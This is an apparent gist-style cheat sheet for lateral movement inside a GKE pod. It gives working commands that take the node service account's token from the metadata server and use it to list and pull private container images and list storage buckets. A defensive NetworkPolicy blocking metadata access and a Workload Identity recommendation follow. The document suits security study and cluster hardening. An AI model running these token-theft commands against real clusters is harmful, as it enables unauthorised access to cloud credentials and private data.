Lateral movement in GKE Pod using Cloud metadata endpoint
# Get a temporary access token from the Google Cloud instance metadata server
export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \
  jq -r '.access_token')

# List all repositories in Google Container Registry using the access token
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog

# Docker login
echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io

# Pull image
docker pull eu.gcr.io/<image-from-catalog>

# Check scopes associated with the default service account
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
# https://www.googleapis.com/auth/compute
# https://www.googleapis.com/auth/devstorage.read_only
# https://www.googleapis.com/auth/service.management
# https://www.googleapis.com/auth/servicecontrol
# https://www.googleapis.com/auth/logging.write
# https://www.googleapis.com/auth/monitoring

# https://www.googleapis.com/auth/devstorage.read_only can be used to access GCS buckets
gsutil ls

# Read more
# https://cloud.google.com/storage/docs/authentication
# https://cloud.google.com/container-registry/docs/advanced-authentication
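Every step above depends on a pod being able to reach the node's metadata server. As an added defensive example (not part of the gist), the NetworkPolicy below blocks that path for every pod in a namespace; the namespace name `workloads` is an assumption, and the policy only takes effect on clusters with network policy enforcement enabled (GKE Dataplane V2 or Calico).

```yaml
# Added example, not from the gist: deny pod egress to the GCE metadata server.
# metadata.google.internal resolves to the link-local address 169.254.169.254,
# so blocking that single IP makes the /token and /scopes endpoints unreachable.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-metadata-server
  namespace: workloads          # assumed namespace; apply in each namespace that runs untrusted code
spec:
  podSelector: {}               # empty selector: applies to every pod in the namespace
  policyTypes:
    - Egress
  egress:
    # Keep all other egress (including in-cluster DNS) working and carve out
    # only the metadata address.
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32
```

Treat this as a backstop rather than the primary fix: enabling GKE Workload Identity (`gcloud container clusters update CLUSTER --workload-pool=PROJECT_ID.svc.id.goog`, then `--workload-metadata=GKE_METADATA` on each node pool) stops the GKE metadata server from handing pods the node service account's token in the first place.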